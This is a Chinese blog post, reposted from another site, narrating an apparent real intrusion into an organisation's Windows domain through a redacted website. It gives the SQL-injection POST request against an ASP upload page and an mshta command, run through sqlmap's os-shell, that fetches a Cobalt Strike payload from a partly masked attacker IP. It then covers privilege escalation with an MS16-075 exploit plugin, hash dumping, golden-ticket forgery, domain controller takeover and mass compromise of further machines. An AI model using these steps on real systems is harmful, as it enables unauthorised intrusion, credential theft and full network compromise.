内网渗透 | 记一次域渗透实战

caiH

内网渗透 | 记一次域渗透实战
转自：HACK学习呀

目标站：www.xxxxx.xx

脆弱点：http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp

SQL注入POST包

POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1

Host: www.xxxxx.xx

Content-Length: 31

Cache-Control: max-age=0

Origin: http://www.xxxxx.xx

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://www.xxxxx.xx/PhotoUpload/ ... %B8%8A%E5%82%B3.asp

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBB

权限：DBA（SA）

内网横向

CS设置好HTTPS监听器，生成一个html application文件

然后传到CS服务器上

sqlmap在os-shell下执行mshta http://20*.*.*.2*:80/download/file.txt

过一会有台主机上线了

设置好beacon回连时间后检查下服务器的环境

存在域

补丁安装的较多

复制信息到https://bugs.hacking8.com/tiquan/检查下有没有漏补的

发现漏补MS16-075

在github上找到了该exp的cna插件https://github.com/vysecurity/reflectivepotato.git

clone回来加载到CS里

获取到了system权限的beacon

需要注意的是目前进程的父进程是mssql，需要注入到其他用户的进程下，否则执行一些命令时会提示权限不够

选择了WEGO的用户注入

查看域控

根据备注，判断AD1为主域控，AD2、AD3为辅域控

抓下hash然后备用

接管域控

利用抓到的hash伪造金票

然后接管AD1

再从AD1上抓hash

在AD1上抓到了域管的明文密码

然后批量梭哈

拿下运维机